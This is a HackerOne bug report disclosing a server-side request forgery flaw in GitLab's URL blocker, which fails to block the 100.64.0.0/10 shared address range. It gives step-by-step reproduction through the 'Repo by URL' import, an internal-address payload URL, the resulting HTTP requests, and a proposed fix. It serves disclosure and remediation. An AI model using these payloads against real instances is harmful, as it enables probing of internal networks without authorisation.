SSRF possible due to shared address space not being blocked.
HackerOne report #579934 by no1zy
on 2019-05-14, assigned to estrike
:
Summary
Because /lib/gitlab/url_blocker.rb
does not block shared address space, SSRF is possible.
Steps to reproduce
- Go to http://{host}/projects/new".
- Click to "Repo by URL".
- Enter the following in Git repository URL field.
http://100.64.0.5:9999/ssrf
- Enter other required fields.
- Click to "Create project".
GET /ssrf/info/refs?service=git-upload-pack HTTP/1.1
Host: 100.64.0.5:9999
User-Agent: git/2.18.1
Accept: */*
Accept-Encoding: deflate, gzip
Pragma: no-cache
- If you want to send parameters, specify the URL as follows:
http://100.64.0.5:9999/ssrf?param=true#
GET /ssrf?param=true HTTP/1.1
Host: 100.64.0.5:9999
User-Agent: git/2.18.1
Accept: */*
Accept-Encoding: deflate, gzip
Pragma: no-cache
Impact
The shared address space is used as a private network address by the ISP.
Reference: https://en.wikipedia.org/wiki/IPv4_shared_address_space
This issue affects all actions using /lib/gitlab/url_blocker.rb
.
Proposal
To fix this issue, also block the 100.64.0.0/10
netmask.
Edited by Sean Carroll